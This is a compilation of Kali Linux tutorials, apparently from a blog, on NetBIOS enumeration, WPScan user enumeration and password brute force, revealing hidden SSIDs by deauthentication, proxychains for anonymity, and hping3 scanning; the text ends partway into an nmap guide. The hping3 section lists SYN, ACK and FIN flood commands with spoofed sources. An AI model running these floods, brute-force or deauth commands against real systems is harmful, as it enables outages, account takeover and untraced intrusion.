NetBIOS Enumeration Wtih Nmap, NBTSan & Nbstat

NetBIOS Enumeration Wtih nmap & nbstat

NetBIOS Enumeration

With NetBIOS Enumeration we can scan a local area network or a specific target on the intranet and extract NetBIOS information from it like.

  • Devices that belong to a domain
  • Storage shares on the network
  • Domain policies and passwords
  • Printers on the network
  • Group information and users

NetBIOS

Stands for Network Basic Input Output System and allows communication between different applications running on different systems within a LAN.

The service uses a 16 ASCII character string to identify a device on a local network.

The first 15th characters are for identifying devices, the last 16th character is to identify services.

Services and ports.

  • UDP/137 Name service
  • UDP/138 Datagram service
  • TCP/139 Session service

In this quick guide i am using nmap, nbtstat on Windows, and NBTScan on Kali Linux. NBTSan can be run on Windows to if you what to try it there.

You can find several tools on all platforms that you can use for NetBIOS Enumeration, if you wish to test some other tools.

DISCLAIMER: This software/tutorial is for educational purposes only. Please don’t use it for illegal activity. The author is not responsible for the use of the application or the users action.

Common NetBIOS Name Table (NBT) names

NetBIOS Code Type Information
<00> UNIQUE Hostname
<00> GROUP Domain name
<host name><03> UNIQUE Messenger service
<use rname><03> UNIQUE Logged-in user
<20> UNIQUE File Server Service
<21> UNIQUE RAS Client Service
<22> UNIQUE Microsoft Exchange
<1B> UNIQUE Domain Master Browser
<1C> GROUP Domain Controllers
<1D> GROUP Master Browser
<INet~Services> GROUP IIS

Requirements

  • Kali Linux
  • NBTScan
  • Nmap
  • Windows AD
  • Windows client on the same LAN as the Windows AD

Step 1: NetBIOS Enumeration With nbtstat in Windows

Open a CMD in windows and type in the fallowing syntax.

nbtstat -A 192.168.100.11

Ethernet0:
Node IpAddress: [192.168.100.12] Scope Id: []

           NetBIOS Remote Machine Name Table

       Name               Type         Status
    ---------------------------------------------
    ONLINE-IT      <00>  GROUP       Registered
    SRV1           <00>  UNIQUE      Registered
    ONLINE-IT      <1C>  GROUP       Registered
    SRV1           <20>  UNIQUE      Registered
    ONLINE-IT      <1B>  UNIQUE      Registered

    MAC Address = 01:0c:29:3c:83:4e


Npcap Loopback Adapter:
Node IpAddress: [169.254.33.233] Scope Id: []

    Host not found.

C:\>

Step 2: NetBIOS Enumeration With NBTScan

NBTScan is by default installed on Kali Linux, but there is a Windows version as well.

NOTE: You need to open the tool in CMD for it to work in Windows.

We can use the tool to scan a whole network or just one target.

C:\NBTScan>nbtscan.exe  192.168.100.11-254

Doing NBT name scan for addresses from 192.168.100.11-254

IP address       NetBIOS Name     Server    User             MAC address
------------------------------------------------------------------------------
192.168.100.11   SRV1             <server>  <unknown>        01:0c:29:3c:83:4e
192.168.100.12   SRV2             <server>  <unknown>        01-0a-49-67-b8-01

C:\NBTScan>

Adding more arguments to the syntax to extract more information.

C:\NBTScan>nbtscan.exe -v 192.168.100.11

Doing NBT name scan for addresses from 192.168.100.11


NetBIOS Name Table for Host 192.168.100.11:

Incomplete packet, 191 bytes long.
Name             Service          Type
----------------------------------------
ONLINE-IT        <00>              GROUP
SRV1             <00>             UNIQUE
ONLINE-IT        <1c>              GROUP
SRV1             <20>             UNIQUE
ONLINE-IT        <1b>             UNIQUE

Adapter address: 01:0c:29:3c:83:4e
----------------------------------------

C:\NBTScan>

You can find more arguments in NBTScan:s official documentation.

Step 3: NetBIOS Enumeration With Nmap Scripting Engine

To run the nbstat.nse script, open Nmap and run the following syntax.

nmap -sV 192.168.100.11 --script nbstat.nse -v

Host script results:

| nbstat: NetBIOS name: SRV1, NetBIOS user: <unknown>, NetBIOS MAC: 01:0c:29:3c:83:4e (VMware)

| Names:

|   ONLINE-IT<00>        Flags: <group><active>

|   SRV1<00>             Flags: <unique><active>

|   ONLINE-IT<1c>        Flags: <group><active>

|   SRV1<20>             Flags: <unique><active>

|_  ONLINE-IT<1b>        Flags: <unique><active>



NSE: Script Post-scanning.

Initiating NSE at 17:50

Completed NSE at 17:50, 0.00s elapsed

Initiating NSE at 17:50

Completed NSE at 17:50, 0.00s elapsed

Read data files from: C:\Program Files (x86)\Nmap

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 141.97 seconds

           Raw packets sent: 1033 (45.436KB) | Rcvd: 1011 (41.756KB)

Conclusion

As we can see it easy to extract information with NetBIOS Enumeration techniques and tools.

We have used tools on both Windows and Linux and scanned an AD server on the domain.

To countermeasure NetBIOS enumeration you need to disable the service, however some old applications still relays on NetBIOS communication.

Check out the Ethical Hacking notes for more Kali Linux quick guides.




WPScan

WordPress Enumeration with WPScan

WPScan is a vulnerability scanner that comes preinstalled with Kali Linux, but can be installed on most Linux distros.

The tool can be used to scan WordPress installations for vulnerability and security issues.

You can download the Turnkey image from here.

In this tutorial i am using WPScan to enumerate a WordPress website that is running on a Linux lab server, i am using Turnkey Linux with a WordPress preinstalled images for a server, the server is running on VMware Workstation.

DISCLAIMER: This software/tutorial is for educational purposes only. Please don’t use it for illegal activity. The author is not responsible for the use of the application or the users action.

Requirements

  • Kali Linux
  • WordPress Website

Step 1: WPScan Syntax

1.1 Update WPScan vulnerabilities database.

wpscan --update

1.2 Scan a website for vulnerabilities, you can either use a host name or a IP address.

wpscan --url 172.168.200.140

wpscan --url www.wordpress.local

NOTE: If you run WPScan on a website that is not running WordPress you will be notified in the output that the remote site is up, but not running WordPress.

_______________________________________________________________
        __          _______   _____
        \ \        / /  __ \ / ____|
         \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team
                       Version 3.6.0
          Sponsored by Sucuri - https://sucuri.net
      @_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________


Scan Aborted: The remote website is up, but does not seem to be running WordPress.
root@iPhone:~#

1.3 Enumerate plugins

wpscan --url www.wordpress.local --enumerate p

1.4 Scan custom directory

wpscan --url www.wordpress.local --wp-content-dir custom-content

1.5 Enumerate themes

wpscan --url www.wordpress.local --enumerate t

1.6 Stealth Scan

wpscan --url www.wordpress.local --stealthy

1.7 Enumerate users, scan the target site for WordPress authors and usernames.

wpscan --url www.wordpress.local --enumerate u

[i] User(s) Identified:

[+] admin
 | Detected By: Author Posts - Display Name (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] testuser
 | Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)


[+] Finished: Thu Jul 18 15:09:44 2019
[+] Requests Done: 16
[+] Cached Requests: 42
[+] Data Sent: 3.339 KB
[+] Data Received: 26.85 KB
[+] Memory used: 102.207 MB
[+] Elapsed time: 00:00:01
root@iPhone:~#

NOTE: limit how many usernames WPScan will enumerate


Step 2: Brute Force WordPress Account Password

2.1 We can use WPScan to brute force a WordPress account.

To run the attack we need a password wordlist, there is one called “rockyou.txt” in Kali Linux.

You can find it in “/usr/share/wordlists/ “

Type the command into terminal to brute force the password for a user

wpscan –url [wordpress url] –wordlist [path to wordlist] –username [username] –threads [number of threads]

wpscan --url www.wordpress.local –wordlist /usr/share/wordlists/rockyou.txt –username testuser –threads 2

NOTE: Eventually, you should see the password listed in the terminal next to the login ID of the user.

Step 3: Optional

3.1 Use WPScan with Tor and proxychains, for more information on how to setup Tor and proxychains please check out our notes.

NOTE: You need to start the Tor service before running the command.

proxychains wpscan --url www.wordpress.local

Conclusion

As we can see it is very easy for a attacker to scan a WordPress site and brute force a account.

To avoid WordPress enumeration and brute force attacks use WordPress plugins that limits the number of login attempts for a specific username and IP address.

Furthermore administrators should avoid using usernames as nicknames and display names, display names ares shown in WordPress and easy to scan.

WPScan scans the URL’s for usernames, if the administrator username is not used for publishing, then the account wont be scanned by WPScan”

DISCLAIMER: This software/tutorial is for educational purposes only. Please don’t use it for illegal activity. The author is not responsible for the use of the application or the users action.




Uncover Hidden SSID

How To Uncover Hidden SSID With Kali Linux

In this quick lab we will go trough how to Uncover hidden SSID with Kali Linux and a wireless card that can be set to monitor mode.

SSID is short for service set identifier (SSID), SSID is the sequence of characters that uniquely identify a wireless local area network, the name can be up to 32 alphanumeric character and is case sensitive .

By default the configuration mode for a access point is to broadcast the SSID in a beacon frame, this allows clients to discover them easily.

Some network administrators disables the broadcasting of SSID in the configuration file, this tells the access point to not broadcast the SSID in the beacon frame, it is done in believe that it will add one more security layer to the network, the effect of not sending out the SSID is that only devices that knows the name of the SSID can connect to the network.

Unfortunately hiding the SSID will not add any extra security layer to the WLAN, there are lots of different method to uncover a hidden SSID, you can use windows and android tools to automatically discover SSIDs, hiding the SSID should not be considered as a extra security layer.

Requirements

I am using a old D-link router with disabled SSID, for wireless card i am using is my 8 year old AWUS036H-

DISCLAIMER: This software/tutorial is for educational purposes only. Please don’t use for illegal activity. The author is not responsible for the use of the application or the users action.

Step 1: Set Wireless card in monitor mode

1.1 Display wireless card name

sudo iwconfig

eth0      no wireless extensions.

lo        no wireless extensions.

wlan0     IEEE 802.11  ESSID:off/any  
          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off

Here we can see that my wireless card name is called wlan0.

1.2 Kill interfering processes

sudo airmon-ng check kill

1.3 Put the interface into monitor mode, this can be archived in different ways, i am using airmon-ng to start the card in monitor mode.

sudo airmon-ng start wlan0

NOTE: The command will create a new virtual interface with the same name as your old interface plus the word mon.

1.4 Display wireless card to confirm the new interface

sudo iwconfig 

wlan0mon  IEEE 802.11  Mode:Monitor  Frequency:2.457 GHz  Tx-Power=20 dBm   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Power Management:on
          
eth0      no wireless extensions.

lo        no wireless extensions.

root@iPhone:~# 

Step 2: Scan for available networks

2.1 Use airodump-ng to scan for nearby networks and look for your router. i know that my BSSID is 84:C9:B2:6A:9E:90 and i am using channel 6.

sudo airodump-ng wlan0mon

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                                         
 84:C9:B2:6A:9E:90  -29      144       11    0   6  130  WPA2 CCMP   PSK  <length:  0>                   
 F0:9F:C2:AA:6C:B9  -47       45        0    0   1  195  WPA2 CCMP   PSK  Perham                         
 32:CD:A7:15:AD:49  -49       29        0    0   6  54e  WPA2 CCMP   PSK  DIRECT-SoM2020 Series          
 BC:EE:7B:7E:18:90  -49      124       12    0   9  195  WPA2 CCMP   PSK  nocco1                         
 80:2A:A8:44:C5:B1  -51       76        3    0   1  195  WPA2 CCMP   PSK  PontuS                         
 82:2A:A8:44:C5:B1  -51       63        0    0   1  195  WPA2 CCMP   PSK  <length:  0>                   
 F2:9F:C2:AA:6C:B9  -47       51        0    0   1  195  WPA2 CCMP   PSK  <length:  0>                    
 08:86:3B:DD:2C:95  -54       20        4    0   1  130  WPA2 CCMP   PSK  belkin.24d        

I can see that the first SSID network have no SSID “<length: 0>” and it matches my BSSID and channel.

Now type down the BSSID and the channel of your access point and cancel the current command and rerun it specifying the BSSID and channel of the hidden SSID.

sudo airodump-ng -c 6 --bssid 84:C9:B2:6A:9E:90 wlan0mon

CH  6 ][ Elapsed: 18 s ][ 2019-07-15 20:21 ][ paused output                                        
                                                                                                         
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                                         
 84:C9:B2:6A:9E:90  -25  87      185       35    0   6  130  WPA2 CCMP   PSK  <length:  0>               
                                                                                                         
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                               
                                                                                                         
 84:C9:B2:6A:9E:90  84:C9:B2:6A:9E:90   -1    1 - 0      0       21      

We have two options while scanning the network, we can either wait for a new device to connect. The new device will send out a beacon frame, airodump-ng will immediately populate the SSID in the terminal output.

I will now connect a device to the network to demonstrate how it will show up in the output.

CH  6 ][ Elapsed: 6 mins ][ 2019-07-15 20:27 ][ paused output                                         
                                                                                                         
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                                         
 84:C9:B2:6A:9E:90  -24 100     3247      416    0   6  130  WPA2 CCMP   PSK  HoneyP01                   
                                                                                                         
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                               
                                                                                                         
 84:C9:B2:6A:9E:90  84:C9:B2:6A:9E:90   -1    1 - 0      0      262                                       
 84:C9:B2:6A:9E:90  00:C0:CA:95:EA:8B   -7    0 - 1      2        6                                       

Observer that the ESSID is now showing the name HoneyP01

Second options is to force disconnect one or all of devices that are associated with the AP. We can use aireplay-ng to disconnect devices by flooding them with de-authentication packets.

2.2 Open a new terminal and send de authentication packets to all connected devices on the router. The command will send out 5 de-authentication packets to the access point.

sudo aireplay-ng -0 5 -a 84:C9:B2:6A:9E:90 --ignore-negative wlan0mon

20:38:49  Waiting for beacon frame (BSSID: 84:C9:B2:6A:9E:90) on channel 6
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
20:38:49  Sending DeAuth (code 7) to broadcast -- BSSID: [84:C9:B2:6A:9E:90]
20:38:50  Sending DeAuth (code 7) to broadcast -- BSSID: [84:C9:B2:6A:9E:90]
20:38:50  Sending DeAuth (code 7) to broadcast -- BSSID: [84:C9:B2:6A:9E:90]
20:38:51  Sending DeAuth (code 7) to broadcast -- BSSID: [84:C9:B2:6A:9E:90]
20:38:51  Sending DeAuth (code 7) to broadcast -- BSSID: [84:C9:B2:6A:9E:90]
root@iPhone:~# 

2.3 Go back to terminal one, now you should see the ESSID of the hidden WLAN.

CH  6 ][ Elapsed: 7 mins ][ 2019-07-15 20:39 ][ paused output                                        
                                                                                                         
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                                         
 84:C9:B2:6A:9E:90  -16  96     4204      608    0   6  130  WPA2 CCMP   PSK  HoneyP01                   
                                                                                                         
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                               
                                                                                                         
 84:C9:B2:6A:9E:90  84:C9:B2:6A:9E:90   -1    1 - 0      0      322                                       
 84:C9:B2:6A:9E:90  00:C0:CA:95:EA:8B   -7    0 - 1e     0       37                                

We can refine our scan and just target one associated device, modify the command by adding a target station.

sudo aireplay-ng -0 5 -a 84:C9:B2:6A:9E:90 -c 00:C0:CA:95:EA:8B --ignore-negative wlan0mon

Conclusion

Uncovering a hidden SSID is easy, due to when a device connects to an access point. The device and the access point exchanges probe requests and response packets.

We have covered some basic terminal commands to uncover a hidden SSID. All equipment used on the lab is mine. Please don’t preform the commands on unauthorized networks.




Proxychains

How To Use Proxychains Kali Linux

Proxychains

Proxychains is open source software for Linux systems and comes pre installed with Kali Linux, the tool redirect TCP connections through proxies like TOR, SOCKS and HTTP (S) and it allows us to chain proxy servers.

With proxychains we can hide the IP address of the source traffic and evade IDS and firewalls. We can use use proxychains in alto of situations, like when we want to avoid giving up our IP address or when scanning a target or visiting a website.

Furthermore chaining multiple proxies makes it difficult to track down the source IP address of the TCP connection, the application gives us a way to hide ourselves and stay anonymous. However proxy servers are likely to log your traffic and have to obey local law and jurisdiction.

DISCLAIMER: This software/tutorial is for educational purposes only. It should not be used for illegal activity. The author is not responsible for its use or the users action.

Step:1 Upgrade/Update & Install Tor

1.1 Upgrade and update the OS.

sudo apt-get update
sudo apt-get upgrade

1.2 Install the tor service.

sudo apt-get install tor

1.3 Start Tor service.

sudo service tor start

1.4 Display Tor service status.

sudo service tor status

NOTE: Tor service needs to run for proxychains to work.

Step2: Configure Proxychains

2.1 The proxychains configuration file is located in the “/etc/” directory edit the configuration file.

sudo nano /etc/proxychains.conf

There is three methods we can run proxychains.

  1. strict_chain
  2. dynamic_chain
  3. random_chain

strict_chain: is the default option in proxychains, every connection goes through the proxies in order that is listed in the configuration file. Strict chaining is best used when you want the source traffic appear from a particular locations.

dynamic_chain: works like the strict chain but it does not require all the proxies in the configuration file to work. If a proxy is down then the connection will jump to the next proxy server in the list.

random_chain: randomnesses proxy connections from the list on the configuration file, the chain of proxy will look different to the target.

Uncomment out the “dynamic_chains” line, it will enable dynamic chaining.

dynamic_chain
#
# Dynamic - Each connection will be done via chained proxies
# all proxies chained in the order as they appear in the list
# at least one proxy must be online to play in chain
# (dead proxies are skipped)
# otherwise EINTR is returned to the app
#
#strict_chain
#
# Strict - Each connection will be done via chained proxies
# all proxies chained in the order as they appear in the list
# all proxies must be online to play in chain
# otherwise EINTR is returned to the app
#
#random_chain

NOTE: Uncomment “chain_len” if you are using random_chain , the parameter establishes the number of IP addresses in the chain which are utilized in generating your randomized chain of proxies.

2.2 By default proxychains sends traffic through the host at 127.0.0.1 on port 9050. This is the default Tor configuration, if you are planing to use Tor leave the “defaults set to “tor” as it is. If you are not using Tor, you will need to comment out this line.

[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks4  127.0.0.1 9050

2.3 Add proxy servers to the proxychains configuration file, there are free proxy servers on the Internet, i am using free proxy in this lab, you can find them here, another good site with free proxies is spys.one.

Before adding custom proxies add Tor socks5 support, and “socks5 127.0.0.1 9050”

# meanwile
# defaults set to "tor"
socks4         127.0.0.1 9050

SOCKS5          103.21.161.105 6667
HTTPS           156.202.174.101 8080
HTTPS           183.76.154.184 8080
HTTP            142.93.130.169 8118
SOCKS5          178.62.59.71 23187
SOCKS5          50.63.26.13 43001

2.4 Prevent DNS leaks, uncomment “Proxy DNS requests – no leak for DNS data”.

# Quiet mode (no output from library)
#quiet_mode

 Proxy DNS requests - no leak for DNS data
proxy_dns

Exit & Save

Step 3: Proxychains Syntax

3.1 Verify that the proxychains is working.

proxychains firefox www.whatsmyip.org

3.2 Use Proxychains with nmap.

proxychains nmap 1.1.1.1

ProxyChains-3.1 (http://proxychains.sf.net)
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-14 22:00 CEST
Nmap scan report for one.one.one.one (1.1.1.1)
Host is up (0.013s latency).
Not shown: 997 filtered ports
PORT    STATE SERVICE
53/tcp  open  domain
80/tcp  open  http
443/tcp open  https

Nmap done: 1 IP address (1 host up) scanned in 57.22 seconds
root@iPhone:~#

Summit

We have covered how to run proxychains and hide the identity of our source traffic and stay anonymous without being detected.

Check out the Ethical Hacking notes for more Kali Linux quick guides.

DISCLAIMER: This software/tutorial is for educational purposes only.

The tutorial should not be used for illegal activity and the author is not responsible for its use or the users action.




How To Scan a Network With Hping3

Hping3

Hping3 is a command-line oriented TCP/IP packet assembler and analyser and works like Nmap.

The application is able to send customizes TCP/IP packets and display the reply as ICMP echo packets, even more Hping3 supports TCP, UDP, ICMP and RAW-IP protocols, has a traceroute mode, the ability to send files between a covered channel, and many other features like DDOS flooding attacks.

Hping3 can be used to perform:

  • OS fingerprinting
  • ICMP pings
  • Traceroute
  • Port scanning
  • Firewall testing
  • Test IDSes
  • Network testing and auditing
  • MTU discovery
  • Exploit and vulnerabilities discovery
  • DDOS and ICMP flooding

Hping3 comes pre-installed with Kali Linux but and can also be installed on most Linux distros, also you need to run the commands with sudo privileges. Visit the official documentation at to learn more on how you can use Hping3 http://www.hping.org/documentation.php

Useful Options

-h Show this help
-v Show version
-c Packet count
-i –interval
–flood
-V Verbose mode
-D Debugging
-f Fragment packets
-Q Display sequence number

-0 RAW IP mode
-1 ICMP mode
-2 UDP mode
-8 SCAN mode
-9 listen mode

-F Set the FIN flag
-S Set the SYN flag
-P Set the PUSH flag
-A Set the ACK flag
-U Set the URG flag

Commands

Send a ACK packet to a target

hping3 –A 192.168.100.11

HPING 192.168.100.11 (eth0 192.168.100.11): A set, 40 headers + 0 data bytes
len=46 ip=192.168.100.11 ttl=128 id=29627 sport=0 flags=R seq=0 win=32767 rtt=4.0 ms
len=46 ip=192.168.100.11 ttl=128 id=29628 sport=0 flags=R seq=1 win=32767 rtt=2.0 ms
len=46 ip=192.168.100.11 ttl=128 id=29629 sport=0 flags=R seq=2 win=32767 rtt=2.0 ms
len=46 ip=192.168.100.11 ttl=128 id=29632 sport=0 flags=R seq=3 win=32767 rtt=2.0 ms
len=46 ip=192.168.100.11 ttl=128 id=29633 sport=0 flags=R seq=4 win=32767 rtt=0.6 ms
len=46 ip=192.168.100.11 ttl=128 id=29634 sport=0 flags=R seq=5 win=32767 rtt=8.0 ms
len=46 ip=192.168.100.11 ttl=128 id=29635 sport=0 flags=R seq=6 win=32767 rtt=7.1 ms
len=46 ip=192.168.100.11 ttl=128 id=29636 sport=0 flags=R seq=7 win=32767 rtt=7.0 ms
len=46 ip=192.168.100.11 ttl=128 id=29637 sport=0 flags=R seq=8 win=32767 rtt=5.0 ms

Use the -c option to decide on how many packets to send, in this example i am setting the count option to 5.

hping3 -A -c 5 192.168.100.11

HPING 192.168.100.11 (eth0 192.168.100.11): A set, 40 headers + 0 data bytes
len=46 ip=192.168.100.11 ttl=128 id=30010 sport=0 flags=R seq=0 win=32767 rtt=7.9 ms
len=46 ip=192.168.100.11 ttl=128 id=30011 sport=0 flags=R seq=1 win=32767 rtt=7.0 ms
len=46 ip=192.168.100.11 ttl=128 id=30012 sport=0 flags=R seq=2 win=32767 rtt=7.6 ms
len=46 ip=192.168.100.11 ttl=128 id=30013 sport=0 flags=R seq=3 win=32767 rtt=5.1 ms
len=46 ip=192.168.100.11 ttl=128 id=30014 sport=0 flags=R seq=4 win=32767 rtt=4.0 ms

--- 192.168.100.11 hping statistic ---
5 packets transmitted, 5 packets received, 0% packet loss
round-trip min/avg/max = 4.0/6.3/7.9 ms

Create a SYN packet and use the scan mode to scan port 1-1000 on a target.

hping3 -S -8 1-1000 192.168.100.11

Scanning 192.168.100.11 (192.168.100.11), port 1-1000
1000 ports to scan, use -V to see all the replies
+----+-----------+---------+---+-----+-----+-----+
|port| serv name |  flags  |ttl| id  | win | len |
+----+-----------+---------+---+-----+-----+-----+
   53 domain     : .S..A... 128 55677 64240    46
   88 kerberos   : .S..A... 128 55933 64240    46
  135 epmap      : .S..A... 128 56189 64240    46
  139 netbios-ssn: .S..A... 128 56445 64240    46
  389 ldap       : .S..A... 128 56701 64240    46
  445 microsoft-d: .S..A... 128 56957 64240    46
  464 kpasswd    : .S..A... 128 57213 64240    46
  593            : .S..A... 128 52863 64240    46
  636 ldaps      : .S..A... 128 53375 64240    46
All replies received. Done.
Not responding ports: (199 smux) (202 at-nbp) (203 ) (204 at-echo) (299 ) (300 ) (301 ) (306 ) (307 ) (308 ) (309 ) (312 ) (313 ) (407 ) (500 isakmp) (514 shell) (723 ) (729 ) (743 ) (761 ) (763 ) (764 ) (766 ) (767 ) (768 ) (769 ) (772 ) (782 ) (783 spamd) (784 ) (790 ) (791 ) (793 ) (794 ) (798 ) (799 ) (802 ) (803 ) (804 ) (805 ) (808 omirr) (809 ) (810 ) (811 ) (812 ) (813 ) (817 ) (818 ) (819 ) (820 ) (821 ) (822 ) (823 ) (824 ) (825 ) (827 ) (828 ) (829 ) (831 ) (832 ) (833 ) (834 ) (836 ) (837 ) (838 ) (839 ) (840 ) (841 ) (842 ) (843 ) (844 ) (845 ) (846 ) (847 ) (848 ) (849 ) (854 ) (855 ) (858 ) (878 ) (879 ) (880 ) (881 ) (911 ) (912 ) (913 ) (918 )
root@iPhone:~#

Send a UDP scan mode to send UDP request on port 80 to a target, if the UDP port is open then you will get a respond back, great to use when the target have blocked ICMP ping.

hping3 -2 192.168.100.17 -c 2 -p 80

Create a ping packet and use the ICMP mode.

hping3 -1 -c 4 192.168.100.11

HPING 192.168.100.11 (eth0 192.168.100.11): icmp mode set, 28 headers + 0 data bytes
len=46 ip=192.168.100.11 ttl=128 id=34163 icmp_seq=0 rtt=8.1 ms
len=46 ip=192.168.100.11 ttl=128 id=34164 icmp_seq=1 rtt=5.9 ms
len=46 ip=192.168.100.11 ttl=128 id=34167 icmp_seq=2 rtt=4.0 ms
len=46 ip=192.168.100.11 ttl=128 id=34168 icmp_seq=3 rtt=3.0 ms

--- 192.168.100.11 hping statistic ---
4 packets transmitted, 4 packets received, 0% packet loss
round-trip min/avg/max = 3.0/5.2/8.1 ms
root@iPhone:~#

Traceroute to a target using ICM mode and show verbose.

hping3 --traceroute -V -1 192.168.100.11

using eth0, addr: 172.168.200.110, MTU: 1500
HPING google.com (eth0 216.58.211.142): icmp mode set, 28 headers + 0 data bytes
hop=1 TTL 0 during transit from ip=172.168.200.2 name=_gateway
hop=1 hoprtt=3.9 ms
hop=2 TTL 0 during transit from ip=192.168.10.1 name=UNKNOWN
hop=2 hoprtt=2.0 ms
hop=3 TTL 0 during transit from ip=10.33.221.74 name=UNKNOWN
hop=3 hoprtt=8.9 ms
hop=4 TTL 0 during transit from ip=88.129.174.18 name=gbg1.dr8.a3network.se
hop=4 hoprtt=8.9 ms
hop=5 TTL 0 during transit from ip=88.129.128.62 name=gbg1.a7network.se
hop=5 hoprtt=8.0 ms
hop=6 TTL 0 during transit from ip=85.8.9.16 name=gbg1.cr1.a3network.se
hop=6 hoprtt=6.9 ms
hop=7 TTL 0 during transit from ip=85.8.10.20 name=sto2.cr1.a3network.se

Traceroute to determined if port 443 is open, set that local traffic is generated from source port 8080

hping3 --traceroute -V -S -p 443 -s 8080 google.com

using eth0, addr: 172.168.200.110, MTU: 1500
HPING google.com (eth0 216.58.211.142): S set, 40 headers + 0 data bytes
hop=1 TTL 0 during transit from ip=172.168.200.2 name=_gateway
hop=1 hoprtt=8.9 ms
len=46 ip=216.58.211.142 ttl=128 id=34374 tos=0 iplen=44
sport=443 flags=SA seq=8 win=64240 rtt=13.8 ms
seq=905581660 ack=1390210946 sum=3cce urp=0

len=46 ip=216.58.211.142 ttl=128 id=34376 tos=0 iplen=44
sport=443 flags=SA seq=9 win=64240 rtt=13.9 ms
seq=277232268 ack=486133387 sum=5a24 urp=0

len=46 ip=216.58.211.142 ttl=128 id=34377 tos=0 iplen=44
sport=443 flags=SA seq=10 win=64240 rtt=13.0 ms
seq=1939483389 ack=2029365982 sum=8498 urp=0

len=46 ip=216.58.211.142 ttl=128 id=34378 tos=0 iplen=44
sport=443 flags=SA seq=11 win=64240 rtt=12.9 ms
seq=90127368 ack=1561834414 sum=c208 urp=0

Use the TTL in tracerout to check load balancing devices IP address.

hping3 -S 192.168.100.100 -p 80 -T --ttl 13 --tr-keep-ttl -n 

Ping a subnet and don’t scan in order, instead randomize the scan. Use the –rand-dest and the interface -I eth0 operators.

hping3 -1 192.168.100.x --rand-dest -I eth0 

Send a ICMP packet to request a timestamp from a target, if the target have the ICMP responses blocked it wont respond to ICMP packets however it might allow response to timestamp request.

hping3 -1 192.168.100.17 --icmp-ts -c 3

Malicious Commands

DISCLAIMER: This software/tutorial is for educational purposes only. It should not be used for illegal activity. The author is not responsible for its use or the users action, always perform the attacks on your own lab system.

Common used parameters.

  • The –flood parameter, activates the fastest packet sending mode
  • The -p “destport” parameter, specifies the destination port
  • The –spoof parameter, specifies which IP address to be spoofed
  • The -rand-source parameter, activates a random source address
  • The –interface parameter, used to specify interface

Main attack flags.

  • The -S parameter sets the SYN flag
  • The -A parameter sets the ACK flag
  • The -F parameter sets the FIN flag
  • The -R parameter sets the RESET flag
  • The -P parameter sets the PUSH flag
  • The -U parameter sets the URGENT flag

To start a SYN flood attack run the command bellow

NOTE: When running the commands hping3 will not show any output, it is working in the background.

hping3 --flood -p [DST_PORT] [VICTIM_IP] -S

Use hping3 to run a SYN flood attack with a inactive spoofed IP address from the network.

hping3 --flood -p [DST_PORT] [VICTIM_IP] -S --spoof [INACTIVE_IP]

SYN flood attack with with random source IP address.

hping3 --flood -p [DST_PORT] [VICTIM_IP] -S --rand-source

ACK flood attack.

hping3 --flood -p [DST_PORT] [VICTIM_IP] -A

FIN flood attack.

hping3 --flood -p [DST_PORT] [VICTIM_IP] -F

Conclusion

In this lab we have covered the basic commands you can do in hping3, we assembled TCP and UDP packets and used them to scan networks and discovered devices, as always when doing this kind of scans make sore you are authorized to scan the network and devices you are scanning.




How To Scan a Network With Nmap

How To Scan With Nmap

Nmap is a great tool to learn, the application have the ability to scan and map networks and much more, it is a great tool for everybody that works in IT.

It is the first tool i use when i want troubleshot, we can do regular ping or a ping sweeps that scans a range of the subnet or the whole subnet.

The application also offers host discovery, port discovery, operating system version discovery, MAC address, services, exploit and vulnerability detection.

Another great tool to use while learning nmap is Wireshark, It is highly recommended to run Wireshark wile using nmap, following the flow of network traffic will help you analyze and visuals the scans.

We will try some of the popular scanning method that can be used with nmap.

This guide is just meant to give you high level understanding on how to use the different scanning techniques.

Please don’t scan networks or host you are not authorized to do. The networks and hosts scanned in the guide is my home lab.

If you want a more in-depth explanation on how you can use nmap and the switches, i recommend that you read The Official Nmap Project Guide to Network Discovery and Security Scanning”.

Save Output To Txt/Xml File

Description Command Example
Save output to file nmap -oN [file.txt] [Target] nmap -oN file.txt 192.168.100.11
Save output as XML nmap -oX [file.xml] [Target] nmap -oX file.xml192.168.100.11
Save in all formats nmap -oA [file] [Target] nmap -oA file 192.168.100.11

Basic Scanning

Description Command Example
Scan a single host nmap [Target] nmap 192.168.100.100
Scan multiple targets nmap [Target1, Target2] nmap 192.168.100.10,192.168.100.100
Scan a range of IP address nmap [IP Range] nmap 192.168.100.10-99
Scan a Class C subnet nmap [IP/CDIR] nmap 192.168.100.0/24
Resolve FQDN nmap [FQDN] nmap www.eaxmple.com

Quick Scans

Description Command Example
Ping scan nmap -sP [Target] nmap -sP 192.168.100.11
Ping Scan – disable port scanining nmap -sn [Target] nmap -sn 192.168.100.0/24

-sP switch can be used when you want to make a quick ping, the host or hosts will replay to ICMP ping packets.

nmap -sP 192.168.100.11

Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-26 21:05 W. Europe Daylight Time
